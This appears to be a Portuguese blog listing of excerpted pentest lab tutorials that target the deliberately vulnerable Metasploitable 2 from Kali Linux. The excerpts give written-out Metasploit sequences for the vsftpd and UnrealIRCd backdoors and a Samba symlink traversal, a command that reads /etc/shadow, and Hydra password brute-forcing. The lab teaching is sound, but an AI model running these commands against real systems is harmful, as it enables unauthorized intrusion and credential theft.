Utilizando o zenmap com Kali Linux e Servidor Metaploitable 2

Siga as instruções abaixo: 1. Verifique se as VMs do Kali Linux e do Metasploitable 2 estão na mesma rede virtual. 2. Configure um endereço IPv4 através do comando “ifconfig” em cada uma das VMs. 3. Na VM Kali Linux digite “zenmap” no terminal, ou, na barra de Aplicativos vá para: “Information Gathering” -> zenmap.… Continuar lendo Utilizando o zenmap com Kali Linux e Servidor Metaploitable 2

Instalação e Utilização do proxychains

O proxychains serve para a utilização de qualquer software com a Rede Tor. Para a instalação no Debian (7 e 8) e Ubuntu (16.04): apt-get install tor proxychains Para utilizá-lo no Debian ou Ubuntu, siga as instruções abaixo: 1. Edite o arquivo de configuração do proxychains através do comando “gedit /etc/proxychains.conf”. 2. Comente a linha… Continuar lendo Instalação e Utilização do proxychains

Comandos do Metasploit para um backdoor através do vsftp

Neste caso o alvo é servidor Metasploitable 2 utilizando Kali Linux. As instruções seguem abaixo: msfconsole msf > search vsftpd msf > use exploit/unix/ftp/vsftpd_234_backdoor msf > show options msf > set RHOST 192.168.56.101 msf > exploit whoami hostname grep root /etc/shadow Obs.: O mesmo pode ser feito com o exploit abaixo: msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

Um exemplo de utilização do Armitage

Siga as instruções abaixo: 1. Inicie o Kali Linux e servidor Metasploitable 2 em rede virtual. 2. No terminal do Kali Linux digite em sequência os comandos: service postgresqls start   msfconsole 3. No metasploit (msfconsole) digite o comando “db_status”. Se a saída for diferente de “[*] postgresql connected to msf” encerre o aplicativo (comando… Continuar lendo Um exemplo de utilização do Armitage

Comandos do Metasploit para um Backdoor através do Samba

No terminal do Kali Linux, digite: msfconsole msf > use auxiliary/admin/smb/samba_symlink_traversal msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.56.101 msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp msf auxiliary(samba_symlink_traversal) > exploit 2. Por fim, um exemplo de acesso com smbclient para informações sobre o Samba para e navegar na máquina alvo: smbclient //192.168.99.131/tmp smb: \> cd rootfs smb: \rootfs\>… Continuar lendo Comandos do Metasploit para um Backdoor através do Samba

Quebrado senhas do Servidor Metasploitable com Hydra

O servidor alvo é Metasploitable 2. As instruções seguem abaixo: 1. Criei ou habilite uma rede virtual (VirtualBox) entre o Servidor Metasploitable e  uma VM com Kali Linux. Não se esqueça de configurar o endereço IP de cada um. 2. Digite no terminal: hydra -L logins.txt -P senhas.txt http://ip-do-servidor Com esse comando você terá todas… Continuar lendo Quebrado senhas do Servidor Metasploitable com Hydra